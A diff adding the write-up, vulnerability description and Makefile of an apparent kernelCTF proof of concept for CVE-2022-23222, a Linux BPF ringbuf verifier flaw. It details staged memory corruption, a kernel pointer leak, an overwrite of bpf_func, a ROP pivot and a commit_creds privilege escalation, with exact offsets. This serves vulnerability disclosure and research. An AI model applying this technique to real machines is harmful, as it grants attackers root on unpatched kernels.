154 changes: 154 additions & 0 deletions pocs/linux/kernelctf/CVE-2022-23222_cos/docs/exploit.md
@@ -0,0 +1,154 @@
## Overview

There are many types of BPF programs and only some of them are available to unprivileged users.

For this exploit we will use socket filter programs, but we will run them using the BPF_PROG_TEST_RUN command instead of attaching to a socket.
This gives us the ability to provide in/out context and pass the data to/from the program easily.

At the beginning we create two ringbuf maps.

The exploit itself consists of 4 BPF programs.

All except the last one (which executes our ROP chain) call the ringbuf_reserve() and ringbuf_discard() BPF functions. Every ringbuf_reserve() call must be followed by ringbuf_discard() or ringbuf_submit(), otherwise the verifier will complain about unreleased resources.

## Stage 1 - corrupting struct bpf_ringbuf

struct bpf_ringbuf looks like this:
```
struct bpf_ringbuf {
	wait_queue_head_t waitq;          /* 0      0x18 */
	struct irq_work work;             /* 0x18   0x18 */
	u64 mask;                         /* 0x30   0x8  */
	struct page * * pages;            /* 0x38   0x8  */
	int nr_pages;                     /* 0x40   0x4  */

	spinlock_t spinlock __attribute__((__aligned__(64)));               /* 0x80   0x4 */

	long unsigned int consumer_pos __attribute__((__aligned__(4096)));  /* 0x1000 0x8 */
	long unsigned int producer_pos __attribute__((__aligned__(4096)));  /* 0x2000 0x8 */
	char data[] __attribute__((__aligned__(4096)));                     /* 0x3000 0   */
};
```
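The offsets in the dump can be cross-checked with a userspace mirror of the struct. This is only a sketch: `struct rb_layout` and its helper functions are hypothetical names, the two 0x18-byte arrays are placeholders sized from the dump rather than real kernel types, and a GCC-compatible compiler targeting x86-64 is assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userspace stand-in for struct bpf_ringbuf. The two 0x18-byte arrays are
 * placeholders sized from the dump above, not real kernel types. */
struct rb_layout {
	unsigned char waitq[0x18];
	unsigned char work[0x18];
	uint64_t mask;
	uint64_t pages;		/* pointer-sized on x86-64 */
	int nr_pages;
	int spinlock __attribute__((aligned(64)));
	uint64_t consumer_pos __attribute__((aligned(4096)));
	uint64_t producer_pos __attribute__((aligned(4096)));
	char data[] __attribute__((aligned(4096)));
};

size_t rb_off_mask(void) { return offsetof(struct rb_layout, mask); }
size_t rb_off_data(void) { return offsetof(struct rb_layout, data); }

/* Aborts if the mirror disagrees with the offsets listed in the dump. */
void check_rb_layout(void)
{
	assert(offsetof(struct rb_layout, work) == 0x18);
	assert(rb_off_mask() == 0x30);
	assert(offsetof(struct rb_layout, pages) == 0x38);
	assert(offsetof(struct rb_layout, nr_pages) == 0x40);
	assert(offsetof(struct rb_layout, spinlock) == 0x80);
	assert(offsetof(struct rb_layout, consumer_pos) == 0x1000);
	assert(offsetof(struct rb_layout, producer_pos) == 0x2000);
	assert(rb_off_data() == 0x3000);
}
```

The two offsets that matter for the rest of this write-up are `mask` at 0x30 and `data` at 0x3000.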

It's a variable-length object that stores both the metadata and the contents of the ringbuf. It is allocated using alloc_pages_node() + vmap() in bpf_ringbuf_area_alloc().

Here's how this object is initialized:
```
static struct bpf_ringbuf *bpf_ringbuf_alloc(size_t data_sz, int numa_node)
{
	struct bpf_ringbuf *rb;

	rb = bpf_ringbuf_area_alloc(data_sz, numa_node);
	if (!rb)
		return NULL;

	spin_lock_init(&rb->spinlock);
	init_waitqueue_head(&rb->waitq);
	init_irq_work(&rb->work, bpf_ringbuf_notify);

	rb->mask = data_sz - 1;
	rb->consumer_pos = 0;
	rb->producer_pos = 0;

	return rb;
}
```

One of the most important fields is 'mask'. It stores the data size of the ringbuf minus one (max_entries - 1) and is used by bpf_ringbuf_reserve() to check that the size requested by the caller fits within the ringbuf.
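A simplified userspace model of that bound is sketched below. It covers only the mask-based comparison; the kernel function performs additional checks that are omitted here. The function names are hypothetical, and the 8-byte header size is taken from struct bpf_ringbuf_hdr (two u32 fields).

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define RB_HDR_SZ 8u	/* sizeof(struct bpf_ringbuf_hdr): two u32 fields */

/* Record length as stored in the ring: header plus payload, rounded up to 8. */
uint64_t rb_record_len(uint64_t size)
{
	return (size + RB_HDR_SZ + 7) & ~(uint64_t)7;
}

/* Model of the mask-based bound only; other kernel checks are omitted. */
bool rb_len_fits(uint64_t mask, uint64_t size)
{
	return rb_record_len(size) <= mask + 1;
}

/* With max_entries = 0x2000 the mask is 0x1fff. */
void check_rb_len_fits(void)
{
	assert(rb_len_fits(0x1fff, 0x10));	/* small record fits */
	assert(rb_len_fits(0x1fff, 0x1ff8));	/* exactly fills the ring */
	assert(!rb_len_fits(0x1fff, 0x1ff9));	/* one byte too many */
}
```

Because the bound depends only on `mask`, a larger mask value makes larger reservations pass this check.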


Stage 1 BPF program makes only 2 calls:
1. rec = ringbuf_reserve(ringbuf, 0x10, 0) // rec == rb->data+8
2. ringbuf_discard(rec - 0x2fd0) // rec - 0x2fd0 == &rb->mask + 8
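The pointer arithmetic in the two comments above can be checked with plain offsets relative to the start of struct bpf_ringbuf. This is a sketch with hypothetical helper names; the constants come from the struct dump and from the 8-byte struct bpf_ringbuf_hdr.

```c
#include <assert.h>
#include <stdint.h>

#define RB_OFF_MASK 0x30u	/* offsetof(struct bpf_ringbuf, mask), from the dump */
#define RB_OFF_DATA 0x3000u	/* offsetof(struct bpf_ringbuf, data), from the dump */
#define RB_HDR_SZ   8u		/* sizeof(struct bpf_ringbuf_hdr) */

/* Offset of the first record's payload: the header sits at data[0]. */
uint64_t stage1_rec_off(void)
{
	return RB_OFF_DATA + RB_HDR_SZ;
}

/* Offset that the commit path treats as the header for a given sample. */
uint64_t commit_hdr_off(uint64_t sample_off)
{
	return sample_off - RB_HDR_SZ;
}

void check_stage1_offsets(void)
{
	uint64_t sample = stage1_rec_off() - 0x2fd0;

	assert(sample == RB_OFF_MASK + 8);		/* 0x3008 - 0x2fd0 == 0x38 */
	assert(commit_hdr_off(sample) == RB_OFF_MASK);	/* header lands on rb->mask */
}
```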

ringbuf_discard() is implemented by bpf_ringbuf_commit(), called with discard=true:

```
static void bpf_ringbuf_commit(void *sample, u64 flags, bool discard)
{
	unsigned long rec_pos, cons_pos;
	struct bpf_ringbuf_hdr *hdr;
	struct bpf_ringbuf *rb;
	u32 new_len;

	hdr = sample - BPF_RINGBUF_HDR_SZ; // [1]
	rb = bpf_ringbuf_restore_from_rec(hdr);
	new_len = hdr->len ^ BPF_RINGBUF_BUSY_BIT;
	if (discard)
		new_len |= BPF_RINGBUF_DISCARD_BIT;

	/* update record header with correct final size prefix */
	xchg(&hdr->len, new_len); // [2]
	...
}

struct bpf_ringbuf_hdr {
	u32 len;
	u32 pg_off;
};
```

Because we pointed sample at &rb->mask + 8, hdr at [1] points at rb->mask, so hdr->len aliases the low 32 bits of rb->mask.
Our ringbuf was created with a max_entries value of 0x2000, so rb->mask / hdr->len is 0x1fff at this point.
The busy bit (bit 31) is clear in 0x1fff, so the XOR with BPF_RINGBUF_BUSY_BIT sets it. After OR-ing with BPF_RINGBUF_DISCARD_BIT (bit 30), new_len becomes 0xc0001fff, and this value is written to rb->mask at [2].

This means we are now able to read/write ~3 GB of memory starting at rb->data.
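The value written at [2] can be reproduced in userspace. The sketch below mirrors only the two bit operations from bpf_ringbuf_commit(); the function names are hypothetical, and the bit definitions match the UAPI header (bit 31 for busy, bit 30 for discard).

```c
#include <assert.h>
#include <stdint.h>

#define BPF_RINGBUF_BUSY_BIT    (1U << 31)
#define BPF_RINGBUF_DISCARD_BIT (1U << 30)

/* Length word written back by the discard path for a given header value. */
uint32_t rb_discard_len(uint32_t len)
{
	uint32_t new_len = len ^ BPF_RINGBUF_BUSY_BIT;

	new_len |= BPF_RINGBUF_DISCARD_BIT;
	return new_len;
}

/* Size of the window implied by a mask value (mask + 1). */
uint64_t rb_window_size(uint64_t mask)
{
	return mask + 1;
}

void check_mask_corruption(void)
{
	/* Normal record: the busy bit is set, so the XOR clears it. */
	assert(rb_discard_len(0x80000010u) == 0x40000010u);
	/* rb->mask as header: the busy bit is clear, so the XOR sets it. */
	assert(rb_discard_len(0x1fffu) == 0xc0001fffu);
	/* 0xc0002000 bytes, slightly more than 3 GiB. */
	assert(rb_window_size(0xc0001fffu) == 0xc0002000ull);
}
```

The first assertion shows the normal case for contrast: for a real record header the same code clears the busy bit instead of setting it.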

## Stage 2 - leaking kernel function pointer

This program performs the following operations:

1. rec = ringbuf_reserve(ringbuf, 0x6000, 0)
2. fnptr = rec[0x4fe0 + 0x28] // This points to work.func field of the second allocated ringbuf
3. ctx->cb[0] = fnptr // for socket filters context is struct \_\_sk_buff and we are able to write only to selected fields like cb
4. ringbuf_discard(rec, 1)
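One plausible way to account for the 0x4fe0 constant is sketched below. It rests on assumptions that this write-up does not state: the first ringbuf has a 0x2000-byte data area whose pages are mapped twice after 3 metadata pages, the vmap area ends with one guard page, the second ringbuf is mapped immediately after it, and the stage 1 reservation advanced producer_pos by 0x18. All helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SZ     0x1000u
#define RB_OFF_DATA 0x3000u	/* 3 metadata pages precede data[] */
#define RB_HDR_SZ   8u

/* Bytes consumed in the ring by one reservation of `size` payload bytes. */
uint64_t stage_record_len(uint64_t size)
{
	return (size + RB_HDR_SZ + 7) & ~(uint64_t)7;
}

/* Assumed virtual span: metadata + data mapped twice + one guard page. */
uint64_t rb_vmap_span(uint64_t data_sz)
{
	return RB_OFF_DATA + 2 * data_sz + PAGE_SZ;
}

/* Distance from a record's payload to the start of the next mapping. */
uint64_t dist_to_next_rb(uint64_t data_sz, uint64_t prod_pos)
{
	return rb_vmap_span(data_sz) - (RB_OFF_DATA + prod_pos + RB_HDR_SZ);
}

void check_stage2_offset(void)
{
	uint64_t prod_pos = stage_record_len(0x10);	/* left over from stage 1 */

	assert(prod_pos == 0x18);
	assert(rb_vmap_span(0x2000) == 0x8000);
	assert(dist_to_next_rb(0x2000, prod_pos) == 0x4fe0);
}
```

Under these assumptions the numbers line up with the constant used in step 2; on a different kernel or map configuration the distance would need to be recomputed.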

We can now read the address of bpf_ringbuf_notify from the context to calculate the kernel base.
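On the userspace side this is simple arithmetic, sketched below. It assumes the program stored the pointer as one 64-bit write starting at cb[0] on a little-endian machine, so the value comes back split across two 32-bit cb[] slots of the output context. The helper names and the addresses in the check are made-up illustration values, not taken from any real kernel image.

```c
#include <assert.h>
#include <stdint.h>

/* Rebuild a 64-bit value from two consecutive 32-bit cb[] slots. */
uint64_t cb_to_u64(uint32_t lo, uint32_t hi)
{
	return ((uint64_t)hi << 32) | lo;
}

/* Kernel base = leaked function address - that function's image offset. */
uint64_t kernel_base_from_leak(uint64_t leaked_fn, uint64_t fn_offset)
{
	return leaked_fn - fn_offset;
}

void check_kernel_base(void)
{
	/* Hypothetical values, for illustration only. */
	uint64_t leak = cb_to_u64(0x81234560u, 0xffffffffu);

	assert(leak == 0xffffffff81234560ull);
	assert(kernel_base_from_leak(leak, 0x234560) == 0xffffffff81000000ull);
}
```

The offset of bpf_ringbuf_notify has to come from the symbol table of the exact kernel build being targeted.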

## Stage 3 - writing ROP to an array map and overwriting bpf_prog->bpf_func

BPF program objects (struct bpf_prog) are allocated using vmalloc so we can place one after our ringbuf objects.
The most important field of that object is:
```
unsigned int (*bpf_func)(const void *, const struct bpf_insn *); /* 0x30 0x8 */
```

This is a function that gets called when a BPF program is executed.

Here's what our stage 3 program does:

1. rec = ringbuf_reserve(ringbuf, 0x20000, 0)
2. new_bpf_func = ctx->cb[0] // Address of a pivot gadget
3. rec[0xcfd8 + 0x30] = new_bpf_func // &bpf_prog.bpf_func
4. skb_load_bytes(test_data_in, 0, rec + 0xcfd8 + 0x48, 0x100) // &bpf_prog.insn
5. ringbuf_discard(rec, 1)

This overwrites bpf_func of the stage 4 program and copies the ROP chain, provided as skb data, to bpf_prog.insn[].

## Stage 4 - executing program to get RIP control

All we have to do now is run the stage 4 program to get RIP control.

## Pivot to ROP

When .bpf_func is called, RSI contains a pointer to bpf_prog.insn, where our ROP chain is located.

Only 2 gadgets are needed to pivot to the ROP chain:


```
push rsi
jmp qword ptr [rsi + 0x66]
```

and

```
pop rsp
```

## Privilege escalation

The ROP chain does the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and returns to userspace.
48 changes: 48 additions & 0 deletions pocs/linux/kernelctf/CVE-2022-23222_cos/docs/vulnerability.md
@@ -0,0 +1,48 @@
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_BPF and CONFIG_BPF_SYSCALL
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=457f44363a8894135c85b7a9afd2bd8196db24ab

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64620e0a1e712a778095bd35cbb277dc2259281f

## Affected kernel versions

Introduced in 5.8. Fixed in 5.15.157 and other stable trees.

## Affected component, subsystem

bpf

## Description

The commit message explains the verifier issue well:

> Both bpf_ringbuf_submit() and bpf_ringbuf_discard() have ARG_PTR_TO_ALLOC_MEM
> in their bpf_func_proto definition as their first argument. They both expect
> the result from a prior bpf_ringbuf_reserve() call which has a return type of
> RET_PTR_TO_ALLOC_MEM_OR_NULL.
>
> Meaning, after a NULL check in the code, the verifier will promote the register
> type in the non-NULL branch to a PTR_TO_MEM and in the NULL branch to a known
> zero scalar. Generally, pointer arithmetic on PTR_TO_MEM is allowed, so the
> latter could have an offset.
>
> The ARG_PTR_TO_ALLOC_MEM expects a PTR_TO_MEM register type. However, the non-
> zero result from bpf_ringbuf_reserve() must be fed into either bpf_ringbuf_submit()
> or bpf_ringbuf_discard() but with the original offset given it will then read
> out the struct bpf_ringbuf_hdr mapping.
>
> The verifier missed to enforce a zero offset, so that out of bounds access
> can be triggered which could be used to escalate privileges if unprivileged
> BPF was enabled (disabled by default in kernel).

bpf_ringbuf_submit() and bpf_ringbuf_discard() expect the argument to point to a valid ringbuf record and use it to calculate an address to a struct bpf_ringbuf_hdr without any further checks.

Because of the verifier bug described above we can cause bpf_ringbuf_submit()/bpf_ringbuf_discard() to interpret any data as bpf_ringbuf_hdr, causing out-of-bounds read/write issues leading to arbitrary code execution.

@@ -0,0 +1,9 @@
INCLUDES =
LIBS = -pthread -ldl
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17412.294.62.h
	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
	sudo apt-get install libkeyutils-dev